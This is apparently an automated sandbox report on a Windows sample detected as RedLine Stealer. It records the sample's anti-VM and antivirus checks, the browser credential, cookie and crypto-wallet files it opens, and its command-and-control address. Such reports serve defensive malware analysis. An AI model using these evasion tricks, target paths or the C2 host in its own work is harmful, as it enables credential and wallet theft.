Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1D6233D0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 8197			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 1592			Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5296

Thread sleep time: -34126476536362649s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000003.1794469144.000001D623DAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1835593981.000001D623DAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837048091.000001D623DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: file.exe PID: 7056, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.ip.sb	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip	0%	Avira URL Cloud	safe
http://91.92.253.107:13342b	0%	Avira URL Cloud	safe
http://91.92.253.107:1334	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnv	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://tempuri.org/0v	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	0%	Avira URL Cloud	safe
http://91.92.253.107:1334/	0%	Avira URL Cloud	safe
http://91.92.253.1	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.92.253.107:1334/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb	file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip	file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://91.92.253.107:1334	file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.253.107:13342b	file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/0v	file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnv	file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.253.1	file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.92.253.107	unknown	Bulgaria		34368	THEZONEBG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1505135
Start date and time:	2024-09-05 20:24:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
